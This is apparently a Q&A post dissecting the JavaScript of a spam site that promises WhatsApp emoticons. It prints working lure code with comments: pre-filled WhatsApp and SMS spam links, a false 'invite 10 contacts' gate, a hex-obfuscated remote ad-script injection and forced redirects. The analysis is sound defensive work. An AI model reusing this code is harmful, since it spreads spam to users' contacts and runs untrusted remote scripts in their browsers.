Tags: javascript, html, spam, malware

Malicious website: deciphering the code?


So here is a malicious website that tries to get visitors to spam their contacts and so spread the site further; it also leads to an advertisement. I suggest enabling NoScript.
hxxp://trucchiios[.]com/emoticon/index_en.php (defanged)
Now I have the code here that gets executed when you push the big whatsapp button, but what does it do?

// Press counter shared by fn1, fn2 and fn3. It is assigned without var/let/const,
// so in non-strict code it becomes an implicit global. Nothing in the code shown
// persists it, so it starts again at 0 on every page load.
c = 0;
// Declared but never referenced anywhere in the code shown.
var image;

/**
 * Click handler for the WhatsApp "share" flow (which element it is bound to is
 * not shown in this listing).
 *
 * On a mobile user agent, each call increments the global counter `c` and then:
 *   - calls 1-6:  opens a whatsapp:// deep link with a pre-filled lure message;
 *   - calls 7-10: opens the same deep link and also injects a remote script tag;
 *   - call 11+:   opens an ad frame on ads.sprintrade.com.
 * On any other user agent it only shows an alert.
 *
 * Note for analysis: `c` is incremented before the deep link is opened and nothing
 * checks the outcome, so it counts button presses, not messages actually sent.
 *
 * @param {*} x - Unused in the body.
 */
function fn1(x)
{
    // User-agent sniffing: the share flow only runs on phones and tablets.
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        // some code..
        ++c;
        if (c <= 6)
        {
            // Deep link that asks the OS to open WhatsApp with the text already filled
            // in; %0D%0A are CR/LF. The lure text carries the short link
            // http://xy7.co/emoticon. The date/time at the end is a fixed string in
            // this capture - presumably stamped by the server when the page was built.
            window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
            // `ga` is not defined in this listing; the argument shape matches a Google
            // Analytics (analytics.js) event hit. Milestones are reported at presses 2
            // and 4 - presumably so the operator can measure how far visitors get.
            if (c == 2) {
                ga('send', 'event', 'WhatsApp', '1+ share', 'Emoticon EN');
            } else if (c == 4) {
                ga('send', 'event', 'WhatsApp', '3+ shares', 'Emoticon EN');
            }
        } else if (c <= 10) {
            // Presses 7-10: same deep link as above.
            window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
            if (c == 7) {
                ga('send', 'event', 'WhatsApp', 'more than 7 shares', 'Emoticon EN');
            }
            var head = document.getElementsByTagName('head').item(0);
            // String-hiding only: the hex escapes decode to plain ASCII, in order:
            //   [0] "script"           [1] "createElement"   [2] "type"
            //   [3] "text/javascript"  [4] "src"
            //   [5] "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]"
            //   [6] "appendChild"
            // "[timestamp]" is a literal part of the URL; nothing here substitutes it.
            var _0xc631 = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x73\x2E\x73\x70\x72\x69\x6E\x74\x72\x61\x64\x65\x2E\x63\x6F\x6D\x2F\x61\x64\x73\x63\x72\x69\x70\x74\x2E\x70\x68\x70\x3F\x70\x69\x64\x3D\x38\x36\x37\x33\x26\x6F\x72\x64\x3D\x5B\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x5D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
            // Equivalent to: script = document.createElement("script");
            //                script.type = "text/javascript"; script.src = <URL [5]>;
            //                head.appendChild(script);
            // The remote script is fetched over plain HTTP and runs with this page's
            // privileges. Its content is whatever the server returns at load time, so
            // this listing alone cannot show what it does; a new tag is added on each
            // of presses 7-10.
            var script = document[_0xc631[1]](_0xc631[0]);
            script[_0xc631[2]] = _0xc631[3];
            script[_0xc631[4]] = _0xc631[5];
            head[_0xc631[6]](script);
        } else
            // Press 11 onward: no target is given, so this opens a new window/tab
            // (subject to the browser's pop-up blocker) on the ad frame.
            window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else {
        // Desktop visitors are told to come back on a phone.
        window.alert("Please invite via your mobile browser");
    }
}

/**
 * SMS variant of the share handler (which element it is bound to is not shown in
 * this listing).
 *
 * On a mobile user agent, each call increments the same global counter `c` that
 * fn1 uses. For the first 10 presses overall it opens an sms: link with the lure
 * text pre-filled; after that it opens the ad frame. Unlike fn1 it reports no
 * analytics events and injects no script. On other user agents it only alerts.
 *
 * @param {*} x - Unused in the body.
 */
function fn3(x) {
    // User-agent sniffing: same mobile-only gate as fn1.
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        // some code..
        // Counts the press, not a delivered message: nothing checks the outcome.
        ++c;
        if (c <= 10) {
            // sms: URI with an empty recipient and a pre-filled body. It hands off to
            // the device's messaging app, with the same text and short link as the
            // WhatsApp lure.
            window.open("sms:?body=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
        } else
            // Press 11 onward: opens the ad frame in a new window/tab.
            window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else {
        window.alert("Please invite via your mobile browser");
    }
}

/**
 * "Activate" gate (which element it is bound to is not shown in this listing).
 *
 * Once the press counter `c` has reached 10, the only "reward" is the ad frame;
 * nothing in the code shown delivers any emoticons. Below 10 it shows an alert
 * urging the visitor to keep inviting contacts.
 *
 * @param {*} x - Unused in the body.
 */
function fn2(x) {
    if (c >= 10)
    {
        // The promised feature resolves to an advertisement page in a new window/tab.
        window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else
    {
        // Social-engineering pressure: `c` counts button presses in fn1/fn3, not
        // contacts actually invited, so the number shown is not a real invite count.
        window.alert("To activate the new emoticons you have to invite at least 10 contacts. 10 friends or 3 groups. So far you've only invited  " + c + " contacts.");
    }
}
// Countdown that forces a redirect no matter what the visitor does.
// `$` is not defined in this listing - presumably jQuery; TODO confirm.
var n = 300,
    // Fires every 1e3 ms (one second).
    t = setInterval(function() {
        // Comma expression: first write the current n into #countdown and decrement it.
        // Then, once n has dropped to -1 (the tick that displays 0), run both operands
        // of the bitwise `&`: navigate this tab ("_self") to the ad frame and stop the
        // timer. `&` is used only to evaluate both calls; its result is discarded.
        $("#countdown").text(n--), -1 == n && window.open("http://ads.sprintrade.com/adframe.php?pid=12649", "_self") & clearInterval(t)
    }, 1e3);

I would just like someone to tell me what it does. I suspect it's just an adspam, not actual malware, but please take a look into it.


Solution

  • It seems this code is responsible for the increasing number of spam messages received in the last week. I am quite sure this code sends a link to a malicious website using WhatsApp Web:

    window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P [...]", "_self");
    

    If using a mobile device,

    if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {
    

    It also tries to send an SMS:

    "sms:?body=Check out the new WhatsApp animated emoticons :P [...]", "_self");
    

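    Some other adware sites are loaded when this code gets executed. This code seems to perform some other tasks, but it is hard to know: the hex-escaped array in fn1 decodes to ordinary DOM calls that add a script tag pointing at ads.sprintrade.com, so what that remote script does cannot be determined from this listing alone. The script is written in JavaScript.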